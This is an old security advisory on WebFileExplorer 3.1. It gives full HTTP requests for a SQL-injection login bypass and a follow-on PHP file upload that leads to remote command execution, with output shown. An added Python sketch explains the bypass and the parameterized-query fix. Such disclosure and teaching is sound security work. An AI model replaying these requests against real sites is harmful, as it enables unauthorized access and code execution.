WebFileExplorer 3.1 SQL Injection

Date: 09 Apr 2009 | Reported by: Osirys | Type: packetstorm | Source: packetstormsecurity.com

WebFileExplorer 3.1 SQL Injection, Unauthorized Access, Remote Command Execution

`Product Name: WebFileExplorer  
Version : 3.1  
URL : http://www.webfileexplorer.com/  
Price : 99 $ USD  
  
Credits to : Giovanni Buzzin, "Osirys"  
osirys[at]autistici[dot]org  
  
WebFileExplorer v3.1 is prone to multiple vulnerabilities. First, an attacker can inject SQL into the login form  
and bypass it; he only needs to know the name of an existing user to log in as that user.  
Live Exploiting: http://www.webfileexplorer.com/userdemo/  
Headers:  
http://www.webfileexplorer.com/userdemo/body.asp  
  
POST /userdemo/body.asp HTTP/1.1  
Host: www.webfileexplorer.com  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://www.webfileexplorer.com/userdemo/body.asp  
Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 71  
login_name=&dologin=yes&id=admin%27+or+%271%3D1&pwd=osirysp0wa&B1=Login  
  
By sending this request, a remote attacker is able to bypass the login form.  
The SQL injection used is: admin%27+or+%271%3D1  
URL-decoded: admin' or '1=1  
  
Once logged in, the attacker can do a lot of things from the Control Panel: upload files with any  
extension, create files of any type, and so on. So this ordinary authentication bypass can become a dangerous  
arbitrary shell upload, in effect remote command execution.  
  
Headers:  
  
http://www.webfileexplorer.com/userdemo/body.asp?action=savefile&path=/admindemo/demo/er  
  
POST /userdemo/body.asp?action=savefile&path=/admindemo/demo/er HTTP/1.1  
Host: www.webfileexplorer.com  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://www.webfileexplorer.com/userdemo/body.asp?action=newfile  
Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL; ControlPan=max; fileoptions=max; folderoptions=max; SearchBoxStat=max; FoldersTree=off  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 96  
file=test_.php&newfilestuff=%3C%3Fphp+echo+%22I%27m+horn%3Cbr%3E%22%3B+%3F%3E&submit=create+file  
  
Now let's see the response from the created file:  
  
osirys[~]>$ perl asd.txt http://www.webfileexplorer.com/admindemo/demo/er/test_.php  
I'm horn<br>  
osirys[~]>$  
  
Game Over.  
  
`
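
Why the `id` value in the first request logs in, and what a parameterized query changes, as an added example that is not part of the original advisory or of WebFileExplorer's code. The query shape, table and column names are assumptions (the advisory does not show the application's SQL), and SQLite stands in for the real database.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    """Constructed stand-in for the user table (assumed schema, not the product's)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT PRIMARY KEY, pwd TEXT)")
    # Plaintext password only to keep the sketch short; store a hash in practice.
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def login_concat(db, user, pwd):
    """Assumed vulnerable pattern: form values pasted into the SQL text."""
    sql = "SELECT id FROM users WHERE id = '%s' AND pwd = '%s'" % (user, pwd)
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, user, pwd):
    """Hardened form: values are bound as data and never parsed as SQL."""
    row = db.execute("SELECT id FROM users WHERE id = ? AND pwd = ?",
                     (user, pwd)).fetchone()
    return row[0] if row else None

def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

# POST body copied from the advisory's first request.
BODY = "login_name=&dologin=yes&id=admin%27+or+%271%3D1&pwd=osirysp0wa&B1=Login"

if __name__ == "__main__":
    db = make_db()
    form = decode_form(BODY)
    # AND binds tighter than OR, so the concatenated WHERE clause becomes
    #   id = 'admin' OR ('1=1' AND pwd = 'osirysp0wa')
    # and matches the admin row whatever password was sent.
    print("concatenated :", login_concat(db, form["id"], form["pwd"]))
    # Bound as a parameter, the same value is just an unusual user name.
    print("parameterized:", login_param(db, form["id"], form["pwd"]))
    # An unknown name matches no row, which is why the advisory says the
    # attacker must know an existing username.
    print("unknown user :", login_concat(db, "nobody' or '1=1", "x"))
```

Binding parameters closes the login bypass only; the Control Panel's ability to create files with any extension under the web root is a separate issue.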